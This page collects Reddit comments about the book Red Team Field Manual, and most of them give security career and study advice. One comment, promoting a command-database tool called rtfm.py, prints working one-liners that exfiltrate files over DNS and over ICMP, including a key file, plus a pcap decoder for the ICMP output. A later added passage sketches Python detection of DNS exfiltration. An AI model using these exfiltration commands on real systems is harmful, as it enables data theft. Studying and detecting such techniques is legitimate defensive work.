We found 30 Reddit comments about Rtfm: Red Team Field Manual. Here are the top ones, ranked by their Reddit score.
Aloha everyone, I would like to introduce a little tool I've been working on: rtfm.py
https://github.com/leostat/rtfm | https://necurity.co.uk/osprog/2017-02-27-RTFM-Pythonized/
The program aims to give you a database of helpful commands, references, cheatsheets and tips in an indexed, easy to search format.
You can search through the database using one or more of: the command, tags, URLs, references, author, date added, or comments to get the information you need. At the moment it has around 500 commands in it, and it comes with an updater to allow me to push more content to it from GitHub.
At the moment it's not perfect, with the code probably being a tad into the horrendous category, but it works! As a quick example, you may be on a box and wanting to exfil some data, for some odd reason you don't have internet access, but rtfm to the rescue!
12:10:root:rtfm: ./rtfm.py -R exfil
Command ID : 384
Command : for line in `base64 -w 62 [file]`; do host $line.[hostname]; done
Comment : exfil file through DNS, may want to encrypt, also assuming you have a short domain
Tags : linux,bash,loop,interesting
Date Added : 2017-06-18
Added By : Innes
Command ID : 386
Command : ping -p 11010101010101010101010101010199 -c 1 -M do 127.0.0.1 -s 32; for line in `base64 sslfile.key | xxd -p -c 14`; do line2=`echo "11 $line 99" |tr -d ' '`; ping -p $line2 -c 1 -M do 127.0.0.1 -s 32; done; ping -p 11101010101010101010101010101099 -c 1 -M do 127.0.0.1 -s 32
Comment : Exfil over icmp
Tags : linux,networking,loop,interesting
Date Added : 2017-06-18
Added By : Innes
Command ID : 496
Command : for line in $(tshark -r [pcap] -T fields -e data | uniq | grep -v "......................................................" | sed s/.11/11/g | grep "11.99" | sed s/11// | sed s/99$// | tr -d '\n' | sed s/0101010101010101010101010101/'\n'/g |sed s/010101010101010101010101010//g); do echo $line | xxd -r -p | base64 -d;echo +++++++++++++++++++; done
Comment : Convert exfil ICMP back to files from pcap
Tags : linux,networking,loop
Date Added : 2017-06-18
Added By : Innes
Throughout the program I have tried to include references to where the commands have come from, however this has not always been possible. If you spot a missing reference or nod, please let me know and I will add it in!
There are a few bugs in the code I'm aware of, and a couple of things I need to add still but let me know what you think! If you like it, awesome, if you don't then boo. Have a look, and let me know what you think with any suggestions, or if you're feeling nice, submit content for the database / suggestions or code to improve the program.
Have a great day all!
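Seen from the defender's side, command 384 in the post above leaves a recognisable trail in resolver logs: a run of distinct 62-character base64 labels under one parent domain. The Python sketch below is an added example, not part of the original post or of rtfm.py; the log layout, thresholds, addresses and hostnames are assumptions, and the sample lines are constructed.

```python
import base64
import re
from collections import defaultdict

# Standard base64 alphabet. '+', '/' and '=' are not valid hostname
# characters, so a label containing them is already unusual.
B64_LABEL = re.compile(r"^[A-Za-z0-9+/=]+$")
MIN_LABEL_LEN = 40   # assumed threshold; `base64 -w 62` emits 62-char labels
MIN_DISTINCT = 3     # assumed: distinct encoded labels per (client, parent)


def build_sample_log():
    """Constructed 'timestamp client qname' lines; not real traffic."""
    encoded = base64.b64encode(bytes(range(256))).decode()
    # Same wrapping as `base64 -w 62`: fixed 62-char lines plus a short tail.
    chunks = [encoded[i:i + 62] for i in range(0, len(encoded), 62)]
    lines = [
        "2017-06-18T12:09:58 10.0.0.5 www.example.com",
        # Long but hyphenated label: not base64, must not match.
        "2017-06-18T12:09:59 10.0.0.5 "
        "a-very-long-marketing-campaign-landing-page-2017.example.com",
        # A single long hex label (CDN-style): matches the charset once only.
        "2017-06-18T12:10:00 10.0.0.6 "
        "da39a3ee5e6b4b0d3255bfef95601890afd80709.cdn.example.org",
    ]
    lines += [
        f"2017-06-18T12:10:{i + 1:02d} 10.0.0.7 {chunk}.x.example.net"
        for i, chunk in enumerate(chunks)
    ]
    return lines


def find_encoded_label_bursts(lines):
    """Return {(client, parent_domain): distinct_label_count} for suspects."""
    seen = defaultdict(set)
    for line in lines:
        parts = line.split()
        if len(parts) != 3:
            continue  # skip lines that do not fit the assumed layout
        _, client, qname = parts
        label, _, parent = qname.rstrip(".").partition(".")
        if not parent:
            continue
        if len(label) >= MIN_LABEL_LEN and B64_LABEL.match(label):
            seen[(client, parent)].add(label)
    # One long label is common (hashes, CDN names); a burst of them is not.
    return {k: len(v) for k, v in seen.items() if len(v) >= MIN_DISTINCT}


if __name__ == "__main__":
    for (client, parent), count in find_encoded_label_bursts(build_sample_log()).items():
        print(f"{client} sent {count} encoded labels under {parent}")
```

The final, shorter chunk of a file falls below the length threshold, so the count is a lower bound on the number of queries involved.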
Hey man! I work as a Security Analyst - about a year away from graduating with my Bachelors.
I suggest you pick up the CompTIA Security+ Certification, as well as start learning the basics of Networks and how they function. Learn ports and protocols, as well as how IDS/IPS/Firewalls function. This will get you an entry level role as a Jr Analyst. I suggest you use [Professor Messer's Security+ Videos](http://www.professormesser.com/security-plus/sy0-401/sy0-401-course-index/). This will teach you the basics of security work, networking concepts, threats, etc.
At the same time start listening to podcasts like Paul's Security Weekly, Down the Security Rabbit Hole, etc. As well as start reading blogs on hacking to get a feel for what's done.
Get a home lab and learn a few tools like Wireshark and Nmap for basic Security Analyst work - to learn how packets work, how they are structured, and how to scan PCs for ports and services. At the same time, focus on learning about threats and vulnerabilities (which are covered in Security+).
If you want to get into PenTesting then you need a wide range of knowledge. Pick up and learn a few languages (master the basics and understand what the code does and how to read/interpret it). You need to know: PHP, HTML, SQL, Python (or Ruby), and a basic language like C, or Java.
If you want to dig deeper into PenTesting then start reading: https://www.offensive-security.com/metasploit-unleashed/
Good way to get into the Kali Distro and learn how to run Metasploit against vulnerable VMs.
Take a look at https://www.vulnhub.com/resources/ for books, and vulnerable VMs to practice on.
https://www.cybrary.it/ is also a good place with tons of videos on Ethical Hacking, Post Exploitation, Python for Security, Metasploit, etc.
Pick up some books such as
The Hacker Playbook 2: Practical Guide To Penetration Testing
Hacking: The Art of Exploitation
Black Hat Python: Python Programming for Hackers and Pentesters
Rtfm: Red Team Field Manual
The Hacker Playbook and The Art of Exploitation are great resources to get you started and take you step by step on pen testing that will allow you to later explore the endless possibilities.
Also a good list of resources that you can learn more about security:
Getting Started in Information Security
Overall experience and certification are what will get you into the door faster. Most employers will look for experience, but if they see you have motivation to learn and the drive to do so, then they might take you. Certifications also are big in the infosec field, as they get you past HR. And having a home lab and doing side projects in security also reflects well.
Red Team Field Manual
This is one of my security starter trifecta:
Hacking: The Art of Exploitation
Rtfm: Red Team Field Manual
Blue Team Handbook: Incident Response Edition
Alright for hacking... It's a LOTTT of stuff you'll need to learn, everything from hacking wifi, hacking websites, cracking passwords. But really all a hacker is, is someone who knows the system so well they can exploit and break it.
What kind of people are hackers/pen-testers?
Unless your job title is literally "red-teamer, or pentester" then "hackers" are usually security researchers, white hats, security analysts, hobbyists, people who tinker around. But really all hackers are, are computer nerds who love this stuff, this is what we live for. So just don't do anything stupid and don't do anything illegal.
Here are some of the big areas you'll need to learn:
Networking / Network security
Linux / Windows (https://linuxjourney.com is amazing) I learned a ton by creating my own custom Debian based Linux distro.
Cryptography / Stenography
Malware / Malware analysis
System hardening / system security
Privacy techniques (Being safe, Tor, Tails, what you share on social media)
Exploiting services, exploiting machines
Wireless attacks (WEP, WPA, WPA2)
Common vulnerabilities, and exploits
How to use Google. (Like dorking, Shodan, using online resources)
Maybe some basic python and scripting
Basic security concepts like NIPS, NIDS, SIEMS, mitigation, security policies.
Common ports and services (You can find flashcards on Quizlet)
https://www.youtube.com/watch?v=wBp0Rb-ZJak (The Complete Linux Course: Beginner to Power User)
Also check out
https://www.youtube.com/playlist?list=PLG49S3nxzAnmpdmX7RoTOyuNJQAb-r-gd (Messer, Networking)
https://www.youtube.com/watch?v=vrh0epPAC5w (Animated full Network+ course)
150 dumped full courses for free
Practice the skills you learn with CTFs (Capture the flag)
Start researching and studying for certifications, COMPTIA, CISCO, REDHAT
The intro/easy certs are
CompTIA A+ (Hardware, basic computers stuff, cables and stuff)
CompTIA Network+ (Networking, network topologies, types, subnetting, VLANs, DMZs)
CompTIA Security+ (Malware types, threats, attacks, policies)
A bit hard and better certs
Cisco CCNA Cyber ops
CompTIA CySA+ (Security analyst stuff, the Security+ but much more in depth)
CompTIA Pentest+ (Pentesting tools, methodology, steps, etc.)
eLearnSecurity eJPT (junior pentesting cert)
EC-Council CEH (Good for DoD jobs, kinda outdated tho, hacking stuff)
Now it gets pretty advanced
CompTIA CASP+ (advanced methods, concepts, techniques regarding security)
OCSP (Oooh the cool kids have this one, pentesting galore < must have)
CompTIA CISSP (HR and people love this one, high level cert)
My recommended pathway is Security+ > CySA+ > Pentest+ > CEH > CASP+ > OCSP > CISSP
Here is CompTIA's recommended pathway .PDF
Start to learn a programming language
Python is highly recommended for people who are looking for a first language because:
It’s easy to learn.
It’s great for scripting.
It can be used for just about anything.
https://www.youtube.com/watch?v=rfscVS0vtbw (4 hour nice intro to Python course)
Depending how deep you go you might need to learn C and/or Assembly, both are commonly used for malware analysis, reverse engineering, binary exploitation, and exploit development. This also will require you to learn things like GCC, GDB, IDA, Hopper, and all the fun stuff. But this can be really really hard to learn, but is incredibly rewarding.
I can always recommend the Red team Field manual.
Some nice cheatsheets I have printed out.
Given your background as a programmer, I would recommend starting with SQL exploits. You need to have at least a working knowledge in how programs and scripts work, and it gives you the framework for understanding how to be clever with the existing code logic and how to think outside the box.
If that ends up being too easy or once you get a good handle on that, take a look at metasploit and the exploit database associated with that. Rather than just using the exploits, look at the code and get an idea of how the individual exploits work (which are all the same on the base level: using logic in a creative way the original programmers didn't think of or intend).
As for books, I recommend This One as a primer. It's not exactly up to date, but the theory is sound (giving you a solid foundation on how exploits are made and the thought process behind them).
I really like This One for learning metasploit and getting a further understanding of exploit scripts.
And I just love This Book in general. Once you take a look, you'll see why.
Starter for 10;
That should start the digging of the rabbit hole.
Edit: I should elaborate a bit, I've been purposefully obtuse. What makes a good Security Engineer? Curiosity, wanting to know how things work, understanding how things tick and really get under the hood of what makes those ones and zeros truly shine. If the above two don't get you curious and open your eyes to the MASSIVE amount of learning you need to do, as well as the potential rewards/pitfalls/overwhelming feelings, then move along. ;-)
I would stay away from dual booting. It's just a pain in the ass. Install Windows and virtualize (VMware Player/VirtualBox) the Linux environment. If you go with VirtualBox or a pro version of VMware, you have the added benefit of being able to snapshot your environment, muck it up, and roll back to that snapshot.
I use books more for reference than to read through. With that in mind, the single most useful book I own is this: https://www.amazon.com/Rtfm-Red-Team-Field-Manual/dp/1494295504
The books mentioned in your other thread and by /u/dreddriver are good and I would like to add RTFM and Malware Analysis: Investigating and Analyzing Malicious Code. The latter is a little dated but still relevant as far as live memory analysis goes, which is the bees knees in modern forensics.
Make sure to ISOLATE and SANDBOX. Download Metasploitable and Ultimate Lamp.
This is a good guide--
Keep up to date on CVEs
And as always, follow security guys on their blogs, Twitter, and whatever. People are super crafty and always coming up with new ideas.
I have RTFM in my bag, but more for the joke than anything. In reality, it has a lot of good stuff in it, across the board.
I usually bookmark a bunch of stuff, but end up re-googling anyway because it's faster than traversing my bookmarks.
Sorry this has taken me so long to get to. Been busy.
First, understand that Kali is nothing more than a collection of tools. It's those tools that you are actually wanting to learn.
KaliTutorials is one place you can start.
Also, there is an abundance of videos on YouTube and if you are serious about wanting to learn penetration testing/security make sure you bookmark Irongeek.
Like I said earlier, by the time books are written, edited, and published, they can often be out of date.
If you do want to understand some of the basics, here are books you should look at:
Metasploit: The Penetration Tester's Guide
Basic Security Testing with Kali Linux 2 (I haven't read this one but I have heard good things)
The Hacker Playbook
[The Hacker Playbook 2](https://www.amazon.com/Hacker-Playbook-Practical-Penetration-Testing/dp/1512214566/ref=pd_sim_14_4?_encoding=UTF8&pd_rd_i=1512214566&pd_rd_r=2HDYK8BDM5MR8PV03JG8&pd_rd_w=kiAl7&pd_rd_wg=fAjYi&psc=1&refRID=2HDYK8BDM5MR8PV03JG8)
Also a good list of resources can be found here: cybrary.it
I'd be very surprised if you haven't heard or got these given your certs! Either way highly recommend the Blue Team Field Manual and Red Team Field Manual
Yes, most Gov jobs require at least Sec+.
Depending on how much you did as an LEO you may look into computer forensics. Network Security etc. You may also want to beef up knowledge of networking as well. So either the Net+ and/or CCNE cert.
Books are always a good place to start. I don't know about this one but have read a few other books by this publisher that have been pretty good.
Ones I have read/skimmed:
Correct methodology is to break shit. Ignore the rules and bend them.
Just pay attention to what is in scope. Don't take down a production server etc. Don't snoop 3rd party hosted sites.
>doing in my free time
Do whatever interests you.
Red team field manual.
>participate in bug bounties
The biggest thing is the material they provide. The Red team field manual RTFM helped a ton early on.
I mean the book, RTFM - https://www.amazon.com/Rtfm-Red-Team-Field-Manual/dp/1494295504
What else do you want to do? Don't get anything more from Cisco if you aren't planning on doing networking, and even then, Cisco isn't being used as much as others (Palo Alto, for example).
If you want to do Incident Response and Pentest, go for these books
You need to define a bit more what you want to do. What attracts you most about cyber security?
Make your life easier and order this...
I use it for pentesting, but it is a solid small reference book with Linux commands, as well as Windows and others.
You can always grab the O'Reilly Linux book, but this is much more portable and has room for notes.
If you have to use Windows, and many of us do, do yourself a favor and learn some PowerShell. "ls" is a supported alias. In fact, a lot of Unix style commands are. It even uses the pipeline "|", only instead of piping text you are passing .NET objects.
> ps notepad | kill
You don't have to parse out the process id. It derives that from the object.
Do yourself a further favor and install Git. Then you can include all the tools under its usr/bin directory in your path and have such tools as grep, du, find, ssh, scp, etc. all compiled for Windows.
The look on a Windows sysadmin's face when you ssh to a remote server from a pwsh command line makes it all worthwhile.
Edit: I mean, I even run vim with a custom vimrc file in a pwsh console on Windows 10 with my keyboard remapped to Dvorak. And GVim is my default tool for .txt files. I get a lot of weird looks from the Windows sysadmins.
Edit #2: If you want some really squirrely but very effective Win cmd style commands, check out the Red Team Field Manual. Some good shit in here for Linux too.
Just tell him to go read the R.T.F.M. book
Red Team Field Manual (edit: for offense)
If you want to defend against web attacks, the OWASP wiki should be good to get you started.
My recommendations then for self study:
It's actually a thing.
You could find out for only 9$ now on Amazon, but I think pat131 is right though, it looks like an overhyped basic pentesting manual specially designed to extract money from script kiddies' pockets. There are certainly better and more up to date resources available for free on the internet.
ps. "pen-tester" is the politically correct term for Hacker
Since this is the subreddit for DFIR, that's what you're going to end up with as far as suggestions go. For pentesting stuff, check out:
-Web Application Hacker's Handbook: https://www.amazon.com/Web-Application-Hackers-Handbook-Exploiting/dp/1118026470 (this has some labs, but just reading through the various weaknesses in WebApps will be a great start)
-The Hacker Playbook: https://www.amazon.com/dp/1512214566/ref=pd_lpo_sbs_dp_ss_1?pf_rd_p=1944687742&pf_rd_s=lpo-top-stripe-1&pf_rd_t=201&pf_rd_i=1118026470&pf_rd_m=ATVPDKIKX0DER&pf_rd_r=1NSA1RZZ3WQTP374S9WK
-Red Team Field Manual: https://www.amazon.com/Rtfm-Red-Team-Field-Manual/dp/1494295504/ref=pd_bxgy_14_img_2?ie=UTF8&psc=1&refRID=S7FG8F9TCMZMM9HVX2TN
Those two are good general pentesting books. You might also try /r/AskNetsec for other suggestions.
From what I gather, it has to do with hacking computers. http://www.amazon.com/Rtfm-Red-Team-Field-Manual/dp/1494295504/ref=pd_rhf_se_s_cp_4_XYAH?ie=UTF8&refRID=1JBCRB3Q9672J44NKK9A
Appears to be the logo for the Red Team Field Manual. Twitter page here. Amazon link to the book here. This is a reference book for common command line tools used in the security field. Penetration testers would use this, red team / blue team scenario participants, etc.
"Red team" is the common term used for the "bad guys" in security training scenarios. Having a hard copy reference is nice because you are many times operating blind, crafting complex command groups without being able to see the output or reference the man page.
Sure - we are working through this right now along with a lot of supplemental material the teacher has put together himself - the book is fine on its own though.
While you could technically jump straight into this and start messing around with the pen testing applications, I'd strongly recommend working through the book from my original post as you'll have a strong foundation of what you are actually doing and what to do when things go wrong or aren't working exactly right.
We also use this book, however I'd probably not recommend spending the money unless you have worked through both books and really want to get into pen testing. Even then I probably wouldn't recommend it as it's just a reference book or "cheat sheet" of popular commands, locations of files like passwords, etc. etc. It's made to be taken out to the field and as a small reference book if you forget something and don't have time for Google. We are using it because we are actually doing pen testing in random labs where we walk into a room for the first time and have two hours to exploit various things. I'll link it anyway though just in case:
There is another book we haven't bought but he may have us pick up and if that happens I'll link it as well. Hope this all helped and good luck!
edit: I forgot about this - we will be using some of this once we've finished the second book in a few weeks: